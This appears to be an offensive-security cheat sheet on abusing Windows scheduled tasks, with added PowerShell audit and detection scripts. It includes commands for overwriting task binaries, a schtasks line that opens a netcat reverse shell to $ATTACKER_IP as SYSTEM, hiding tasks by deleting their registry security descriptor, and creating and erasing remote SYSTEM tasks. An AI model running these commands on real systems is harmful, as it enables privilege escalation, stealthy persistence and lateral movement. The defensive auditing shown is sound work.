Use the built-in schtasks.exe command to create and manipulate Windows tasks (basically the equivalent of *NIX cron jobs).

Local tasks

Exploit local Windows tasks

# List scheduled tasks
#
schtasks
 
# View details about a scheduled task
#
schtasks /query /tn $TASK_NAME /fo list /v
 
# Check the permissions of an executable
#
icacls $PATH_TO_BINARY
 
# Modify the permissions (if possible/desired)
#
icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION
 
# You can overwrite files in Windows in the same way you'd do
# in Linux (however, this can cause issues with line
# endings... probably best to just use notepad.exe here
# instead)
#
echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE
 
# Force a task to run (iff the current user has permission to
# do so)
#
schtasks /run /tn $TASK_NAME

If a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task (the task definition, owner and trigger all stay the same, so nothing about the task itself looks modified).
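The weakness exploited above is a task whose action binary (or batch file) is writable by someone other than the account the task runs as. The following audit, added here as an example and not part of the original page, walks every registered task, resolves each action's executable the way the scheduler would, and reports the ones a non-privileged identity can write to. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later); the list of "trusted" SIDs is an assumption and should be adjusted for your environment.

```powershell
# Added example: audit scheduled-task action binaries for write access by
# identities other than SYSTEM, Administrators and TrustedInstaller.
# The $TrustedSids list is an assumption; extend it for your environment.

$TrustedSids = @(
    'S-1-5-18',          # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',      # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # NT SERVICE\TrustedInstaller
)

# Any of these rights lets the holder change what the task ends up executing.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData

function Resolve-TaskBinary {
    param([string]$Execute)
    # Strip surrounding quotes, expand %SystemRoot%-style variables, and resolve
    # bare names such as "cmd.exe" through PATH, as the scheduler service would.
    $raw = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (Test-Path -LiteralPath $raw -PathType Leaf) {
        return (Resolve-Path -LiteralPath $raw).Path
    }
    $cmd = Get-Command -Name $raw -CommandType Application -ErrorAction SilentlyContinue |
           Select-Object -First 1
    if ($cmd) { return $cmd.Source }
    return $null
}

function Get-UntrustedWriters {
    param([string]$Path)
    # Return every Allow ACE that grants a write-class right to a non-trusted SID.
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch {
            $sid = $ace.IdentityReference.Value
        }
        if ($TrustedSids -notcontains $sid) { $ace.IdentityReference.Value }
    }
}

function Find-WritableTaskBinaries {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }      # COM-handler actions have no Execute
            $bin = Resolve-TaskBinary $action.Execute
            if (-not $bin) { continue }                  # binary missing: a different finding
            $writers = @(Get-UntrustedWriters $bin)
            if ($writers.Count -gt 0) {
                [pscustomobject]@{
                    Task      = "$($task.TaskPath)$($task.TaskName)"
                    RunAs     = $task.Principal.UserId
                    Binary    = $bin
                    Arguments = $action.Arguments
                    Writers   = ($writers -join ', ')
                }
            }
        }
    }
}

Find-WritableTaskBinaries | Sort-Object Task | Format-Table -AutoSize
```

Run it from an elevated prompt so that tasks under other users' folders are enumerated too. A hit where RunAs is S-1-5-18 (SYSTEM) and Writers includes BUILTIN\Users or Authenticated Users is exactly the situation the commands above take advantage of; the fix is to tighten the file ACL (icacls, as in the page) or move the binary under a protected directory. Generic rights such as GENERIC_ALL appear as raw integers outside the FileSystemRights enum and are not matched by the mask, so treat the output as a first pass rather than a proof of absence.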

It may also be possible to create your own tasks.

# Creates a task that executes a netcat reverse shell back to
# the attacker. "/sc" and "/mo" indicate that the task should
# be run every minute. "/ru" indicates that the task will run
# with SYSTEM privileges.
#
schtasks /create /sc minute /mo 1 /tn $TASK_NAME `
	/tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" `
	/ru SYSTEM
 
# Checks to see if the task was created successfully.
#
schtasks /query /tn $TASK_NAME

Stealthy tasks

Deleting the task Security Descriptor will make the task invisible to any user in the system. Note that this requires PsExec!

  1. Use PsExec64.exe -s -i regedit to open regedit with SYSTEM privileges.

  2. Search in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.
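Because the hiding trick only removes the SD value and leaves the rest of the task's registry footprint intact, the same registry path is where a defender finds it. The script below is an added example, not part of the original page: it walks TaskCache\Tree from an elevated prompt, treats a key as a task when its Id GUID has a matching entry under TaskCache\Tasks, and reports every task key that has no SD value, alongside whether the scheduler itself still lists it. The value names Id, SD, Path and Author are what these keys normally carry; Author being present on every entry is an assumption.

```powershell
# Added example: find Task Scheduler entries whose security descriptor (SD)
# has been removed from TaskCache\Tree. Requires an elevated prompt.

$TreeKey  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
$TasksKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'

function Find-HiddenScheduledTasks {
    # Snapshot of what the scheduler is willing to show us, keyed by "\Folder\Name".
    $visible = @{}
    foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        $visible["$($t.TaskPath)$($t.TaskName)"] = $true
    }

    foreach ($key in Get-ChildItem -Path $TreeKey -Recurse) {
        $names = $key.GetValueNames()
        if ($names -notcontains 'Id') { continue }               # no GUID: not a task entry
        $id = $key.GetValue('Id')
        $detailKey = Join-Path $TasksKey $id
        if (-not (Test-Path -Path $detailKey)) { continue }      # folder GUID, not a task
        if ($names -contains 'SD') { continue }                  # descriptor present: normal

        # Turn "HKEY_LOCAL_MACHINE\...\Tree\Microsoft\Windows\Foo" into "\Microsoft\Windows\Foo",
        # which is the form Get-ScheduledTask uses for TaskPath + TaskName.
        $taskPath = $key.Name.Substring($key.Name.IndexOf('\Tree\') + 5)
        $detail   = Get-ItemProperty -Path $detailKey -ErrorAction SilentlyContinue

        [pscustomobject]@{
            TaskPath          = $taskPath
            Id                = $id
            Author            = $detail.Author        # assumed present; empty if not set
            DefinitionPath    = $detail.Path
            VisibleToScheduler = [bool]$visible[$taskPath]
        }
    }
}

Find-HiddenScheduledTasks | Format-Table -AutoSize
```

A result with VisibleToScheduler equal to False confirms the effect the steps above describe: the task still exists and still runs, but schtasks /query and the Task Scheduler GUI no longer return it. Restoring visibility means recreating the task (so a fresh SD is written) rather than hand-editing the value, and the registry keys themselves are worth monitoring for value deletions under Tree.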


Remote tasks

Exploit remote Windows tasks

Warning

By default, UAC restricts remote schtasks.exe calls to domain admins and the default local “Administrator” account. Local Windows admins cannot call this service remotely without first disabling UAC!

The schtasks.exe command can also be used to create and manipulate tasks on remote machines. It talks to the Task Scheduler service over Windows RPC (TCP 135), falling back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, this is how schtasks.exe works locally as well; the only difference is that in the local case a local named pipe is always used.)

# Create $ATTACKER_TASK on the $TARGET_HOST. Note that /sd
# (start date) and /st (start time) don't matter if we're
# invoking the task manually, as we do next.
#
schtasks /s $TARGET_HOST /RU "SYSTEM" /create `
         /tn "$ATTACKER_TASK" /tr "$SOME_COMMAND" /sc ONCE `
         /sd 06/25/2023 /st 16:10
 
# Invoke $ATTACKER_TASK.
#
schtasks /s $TARGET_HOST /run /TN "$ATTACKER_TASK"
 
# Clean up after yourself.
#
schtasks /S $TARGET_HOST /TN "$ATTACKER_TASK" /DELETE /F
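Every registration in the sequence above, local or remote, produces Security event 4698 when "Audit Other Object Access Events" is enabled, and the event carries the full task XML. The script below is an added example, not part of the original page: it parses those events to show who registered each task and what it runs, checks whether the registering logon was a network logon (4624 with LogonType 3), and reports whether the UAC remote restriction described in the warning is still in force. The event-data field names (SubjectUserName, SubjectLogonId, TaskName, TaskContent, TargetLogonId, LogonType) are the documented ones for 4698 and 4624; joining them by logon ID is the correlation you would normally do in a SIEM and is stated here as an assumption.

```powershell
# Added example: surface scheduled-task registrations (Security 4698), flag the
# ones made over a network logon, and check the UAC remote-restriction setting.
# Requires an elevated prompt to read the Security log.

$TaskNs = 'http://schemas.microsoft.com/windows/2004/02/mit/task'

function Test-NetworkLogon {
    param([string]$LogonId)
    # Assumption: the 4698 SubjectLogonId matches a 4624 TargetLogonId (both are
    # hex strings such as 0x3e7). LogonType 3 is a network logon, e.g. via RPC/SMB.
    $xpath = "*[System[EventID=4624] and EventData[Data[@Name='TargetLogonId']='$LogonId' " +
             "and Data[@Name='LogonType']='3']]"
    $hit = Get-WinEvent -LogName Security -FilterXPath $xpath -MaxEvents 1 -ErrorAction SilentlyContinue
    return ($null -ne $hit)
}

function Get-TaskRegistrationEvents {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($ev in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        # Flatten <EventData><Data Name="...">value</Data> into a hashtable.
        $x = [xml]$ev.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # TaskContent is the registered task definition in the Task Scheduler XML schema.
        $taskXml = [xml]$d['TaskContent']
        $nsm = New-Object System.Xml.XmlNamespaceManager($taskXml.NameTable)
        $nsm.AddNamespace('t', $TaskNs)
        $cmdNode  = $taskXml.SelectSingleNode('//t:Exec/t:Command', $nsm)
        $argNode  = $taskXml.SelectSingleNode('//t:Exec/t:Arguments', $nsm)
        $userNode = $taskXml.SelectSingleNode('//t:Principal/t:UserId', $nsm)

        $runAs     = if ($userNode) { $userNode.InnerText } else { '(task default)' }
        $command   = if ($cmdNode)  { $cmdNode.InnerText }  else { '(non-Exec action)' }
        $arguments = if ($argNode)  { $argNode.InnerText }  else { '' }

        [pscustomobject]@{
            Time        = $ev.TimeCreated
            Creator     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            LogonId     = $d['SubjectLogonId']
            NetworkLogon = Test-NetworkLogon $d['SubjectLogonId']
            Task        = $d['TaskName']
            RunAs       = $runAs
            Command     = $command
            Arguments   = $arguments
        }
    }
}

function Test-RemoteUacRestriction {
    # UAC remote restrictions are active unless LocalAccountTokenFilterPolicy is 1.
    # While active, non-built-in local admins get a filtered token over the network,
    # which is why the warning above says remote schtasks fails for them.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $v = (Get-ItemProperty -Path $key -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
    return ($null -eq $v -or $v -eq 0)
}

"UAC remote restrictions in force: $(Test-RemoteUacRestriction)"
Get-TaskRegistrationEvents -Hours 24 |
    Where-Object { $_.NetworkLogon -or $_.RunAs -eq 'S-1-5-18' } |
    Format-Table Time, Creator, NetworkLogon, Task, RunAs, Command -AutoSize
```

The filter at the end keeps the two cases the commands on this page produce: a task registered from a network logon (the remote /create) and a task that runs as SYSTEM (the /RU "SYSTEM" example). A short-lived task that is created, run and deleted within a minute also leaves a 4699 deletion event and, if the TaskScheduler/Operational log is enabled, events 106, 140 and 141; pairing 4698 with a quick 4699 for the same TaskName is a cheap way to spot the create-run-clean-up pattern shown above.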